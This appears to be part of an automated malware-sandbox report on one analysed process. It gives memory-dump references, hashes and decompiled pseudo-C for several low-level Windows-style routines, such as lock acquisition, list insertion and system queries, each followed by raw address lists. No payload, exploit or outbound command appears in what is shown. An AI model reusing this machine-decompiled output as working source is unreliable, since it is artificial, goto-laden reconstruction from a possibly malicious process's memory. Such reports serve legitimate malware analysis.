0x0297dd7b
0x0297dc8f
0x0297dc8f
0x0297dc92
0x0297dc99
0x0297dc9f
0x0297dca5
0x0297dcaa
0x0297dcaa
0x0297dcb3
0x0297dcb8
0x0297dcbb
0x0297dcc1
0x0297dccf
0x0297dcd2
0x0297dcd5
0x0297dcd7
0x0297dcda
0x0297dcdc
0x0297dcdc
0x0297dce2
0x0297dce4
0x00000000
0x0297dce4

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0eb398a5e5928704fe09ef3304f73feda1205e6e91a2e5025f1c125ab4920dd
Instruction ID: 83697e19bcf582f627d34d471763b66cd312fb57c5b002e701c545df4e70f1ba
Opcode Fuzzy Hash: e0eb398a5e5928704fe09ef3304f73feda1205e6e91a2e5025f1c125ab4920dd
Instruction Fuzzy Hash: 1D51AD75A00615CFCB14DFA8C480BAEFBF6BF89310F24855AD959A7340DB31A944CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0296EF40, Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0296EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E02959080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77dfc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E02952D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x0296ef4b
0x0296ef4d
0x0296ef57
0x0296f0bd
0x0296f0c2
0x0296f0d2
0x0296f0d2
0x0296f0c2
0x0296ef5d
0x0296ef5f
0x0296ef67
0x0296ef6a
0x0296ef6d
0x0296ef74
0x0296ef7f
0x0296ef82
0x0296ef82
0x0296ef86
0x0296ef88
0x0296ef8c
0x0296ef8f
0x0296ef8f
0x0296ef8f
0x00000000
0x0296ef91
0x0296ef93
0x0296efc4
0x0296efc4
0x0296efc4
0x0296efca
0x0296efd0
0x0296f0a6
0x00000000
0x00000000
0x0296f0af
0x029bbb06
0x029bbb0a
0x0296f0b5
0x0296f0b5
0x0296f0b5
0x0296f0b5
0x00000000
0x0296efd6
0x0296efd9
0x0296f0de
0x0296f0e2
0x0296efdf
0x0296efdf
0x0296efdf
0x0296efe5
0x029bbafc
0x029bbafc
0x0296efe5
0x0296efeb
0x0296efed
0x0296f00f
0x0296f011
0x0296f01a
0x0296f01d
0x0296f021
0x0296f028
0x0296f029
0x0296f029
0x0296f02c
0x00000000
0x0296f02c
0x0296eff3
0x0296eff9
0x0296f0ea
0x0296f0ed
0x0296f0ef
0x00000000
0x0296f0ef
0x0296f003
0x029bbb12
0x0296f045
0x0296f049
0x0296f051
0x0296f09e
0x0296f0a0
0x0296f0a0
0x0296f09e
0x0296f053
0x0296f064
0x0296f064
0x0296f06b
0x029bbb1a
0x029bbb1a
0x0296f071
0x0296f071
0x0296f07d
0x0296f082
0x0296f08f
0x0296f08f
0x0296f009
0x0296f00d
0x00000000
0x0296f00d
0x0296efd0
0x0296ef97
0x0296efa5
0x0296efaa
0x00000000
0x0296efac
0x0296efac
0x0296efac
0x00000000
0x0296efb2
0x0296f036
0x0296f03a
0x0296f040
0x0296f090
0x00000000
0x0296f092
0x0296f042
0x00000000
0x0296f042
0x0296efb7
0x0296efb9
0x0296efbc
0x0296efb0
0x0296efb0
0x00000000
0x0296efbe
0x0296efbe
0x0296efc1
0x00000000
0x0296efc1
0x0296efbc
0x0296efaa
0x0296ef91

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: 7435fd06f74fc2557e967642ccb68d29f5cc327ce526bf7dc2aac44d9967246d
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: 20511534E04249EFDB14CB68D1D8BFEBBF5AF15318F1881B8D88653681C375A989C741

Uniqueness

Uniqueness Score: -1.00%

Function 02A2740D, Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E02A2740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E029AD4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0299F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L02974620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L02974620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0299F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L02974620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x02a2740d
0x02a2740d
0x02a27412
0x02a27413
0x02a27416
0x02a27418
0x02a2741c
0x02a2741f
0x02a27422
0x02a27422
0x02a27428
0x02a2742a
0x02a2742a
0x02a27451
0x02a27432
0x02a2744f
0x02a2744f
0x00000000
0x02a27434
0x02a27438
0x02a27443
0x02a27517
0x02a27517
0x02a2751a
0x02a27535
0x02a27520
0x02a27527
0x02a2752c
0x02a27531
0x02a27533
0x00000000
0x02a27533
0x00000000
0x02a27531
0x02a2754b
0x02a2754f
0x02a2755c
0x02a2755c
0x02a2755f
0x02a27560
0x02a27561
0x02a27562
0x02a27563
0x02a27568
0x02a2756a
0x02a2756c
0x02a2756d
0x02a2756d
0x02a2756f
0x02a27572
0x02a27574
0x02a27577
0x02a2757c
0x02a2757f
0x00000000
0x02a27551
0x02a27551
0x02a27551
0x02a27553
0x02a27553
0x02a27449
0x02a27449
0x02a2744c
0x02a2744c
0x00000000
0x02a2744c
0x02a27443
0x02a2750e
0x02a27514
0x02a27514
0x02a27455
0x02a27469
0x02a2746d
0x00000000
0x02a27473
0x02a27473
0x02a27476
0x02a27480
0x02a27484
0x02a2748e
0x02a27493
0x02a27493
0x02a27496
0x02a27499
0x02a274a1
0x02a274b1
0x02a274b5
0x00000000
0x02a274bb
0x02a274c1
0x02a274c1
0x02a274c4
0x02a274c5
0x02a274c6
0x02a274c7
0x02a274c8
0x02a274cd
0x00000000
0x02a274d3
0x02a274d3
0x02a274d6
0x02a274d8
0x02a274db
0x02a274dd
0x02a274e0
0x02a274e7
0x02a274ee
0x02a274ee
0x02a274f4
0x02a274f9
0x00000000
0x02a274fb
0x02a274fb
0x02a274fd
0x02a27500
0x02a27503
0x02a27505
0x02a27505
0x02a274f9
0x00000000
0x02a274cd
0x02a274b5
0x00000000

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: c1db17d87e34bfe8078a0c7aa3802943b66517e9413c752486cb4d8859c1b704
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: 78515D71600606EFDB15CF58C980A56FBB9FF45304F15C1AAE9089F252E771EA4ACF90

Uniqueness

Uniqueness Score: -1.00%

Function 02982990, Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E02982990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x2a2ff00);
				E029AD08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x2931664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0299E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x2931668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E029D51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x293166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E02982AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E02966600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E02982C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E0296EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E02982AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E02982C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E02982ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E029AD0D1(_t62);
				goto L28;
			}

0x02982990
0x02982992
0x02982997
0x029829a3
0x029829a6
0x029829ab
0x029829ad
0x029829b2
0x029c5c80
0x029829b8
0x029829b8
0x029829bb
0x029829c0
0x029829c5
0x029829c6
0x029829c6
0x029829cb
0x00000000
0x00000000
0x029829cd
0x029829d0
0x029829d9
0x029829db
0x029829dd
0x02982a7f
0x02982a84
0x02982a87
0x02982a89
0x029c5ca1
0x029c5ca3
0x00000000
0x02982a8f
0x02982a8f
0x00000000
0x02982a8f
0x00000000
0x029829e3
0x029829e3
0x029829e3
0x00000000
0x029829e3
0x029829dd
0x00000000
0x029829db
0x029829e6
0x029829e9
0x029829eb
0x029829ed
0x029829f3
0x029829f5
0x029829f8
0x029829fa
0x02982a97
0x02982a9a
0x02982a9d
0x02982add
0x00000000
0x02982a9f
0x02982aa2
0x02982aa5
0x02982aa8
0x02982aab
0x029c5cab
0x029c5caf
0x029c5cc5
0x029c5cda
0x029c5cdc
0x029c5cdf
0x029c5ce5
0x00000000
0x029c5ceb
0x029c5ced
0x029c5cee
0x00000000
0x029c5cee
0x029c5cb1
0x029c5cb4
0x029c5cb9
0x029c5cbb
0x00000000
0x029c5cbd
0x029c5cbd
0x00000000
0x029c5cbd
0x029c5cbb
0x02982ab1
0x02982ab1
0x02982ac4
0x02982ac6
0x02982ac6
0x00000000
0x02982ac6
0x02982aab
0x00000000
0x02982a00
0x02982a09
0x02982a0e
0x02982a21
0x02982a24
0x02982a35
0x02982a3a
0x02982a3d
0x02982a42
0x02982a59
0x02982a59
0x02982a5c
0x02982a5f
0x02982a5f
0x029829fa
0x029829f3
0x02982a64
0x02982a64
0x02982a6b
0x02982a6b
0x02982a6d
0x02982a72
0x00000000

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f29eda462ba782673b37e2593a1cca8575f96d4d1b60e0fe7cfa00c7185bf36
Instruction ID: 940dda73b8e5611fcc02c5626bb7b247e30bedf8fce6ca42fe6f0cafc41e04c1
Opcode Fuzzy Hash: 1f29eda462ba782673b37e2593a1cca8575f96d4d1b60e0fe7cfa00c7185bf36
Instruction Fuzzy Hash: 13514671D00259DFDF25EF94C980A9EBBBABF48714F198059EC14AB260C335D952CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02984BAD, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E02984BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x2a4d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E0295CC50(_t86);
					L11:
					return E0299B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x2a48504
				E02972280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0299FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0299B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L02974620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E0295CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x2a48504
								E0296FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E02984F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}

0x02984bad
0x02984bbf
0x02984bc2
0x02984bc6
0x02984bcd
0x02984bd9
0x029c67fe
0x029c6800
0x02984ccc
0x02984ccd
0x02984cb7
0x02984cc9
0x02984cc9
0x02984bdf
0x02984be5
0x00000000
0x00000000
0x02984beb
0x02984bef
0x00000000
0x00000000
0x02984bf5
0x02984bf9
0x02984c06
0x02984c0b
0x02984c17
0x02984c1c
0x02984c1f
0x02984c25
0x02984c33
0x02984c3d
0x02984c40
0x02984c43
0x02984c47
0x02984c4d
0x02984c53
0x02984c54
0x02984c55
0x02984c56
0x02984c5b
0x02984c5c
0x02984c63
0x02984c6b
0x00000000
0x00000000
0x029c6776
0x029c6784
0x029c6784
0x029c679f
0x029c67a7
0x029c67af
0x029c67ce
0x00000000
0x029c67b1
0x029c67b7
0x029c67b8
0x029c67c1
0x029c67d3
0x029c67d9
0x029c67dd
0x02984c94
0x02984c94
0x02984c98
0x02984c9c
0x02984ca3
0x029c67f4
0x029c67f4
0x02984cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x02984cb5
0x02984c79
0x02984c7e
0x02984c89
0x02984c8b
0x02984c8f
0x02984c8f
0x00000000
0x02984c89
0x029c67c3
0x00000000
0x029c67c3
0x029c67af
0x02984c73
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3085d8ce72db9f90a668e8af8f1ac6f8db397afb79f4a65e602e2ca5d0918e2
Instruction ID: 14bc7e78e4258cb96aede77f03b35a0b02b3ec463e66d630a2332036def810fb
Opcode Fuzzy Hash: b3085d8ce72db9f90a668e8af8f1ac6f8db397afb79f4a65e602e2ca5d0918e2
Instruction Fuzzy Hash: 8C419435A402299BCF21EF68C940BEA77BDEF85710F1504A9E908AB240DB74DE85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 02984D3B, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E02984D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x2a4d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0299FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x2a47bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0299B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L02974620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E0295CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0299B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
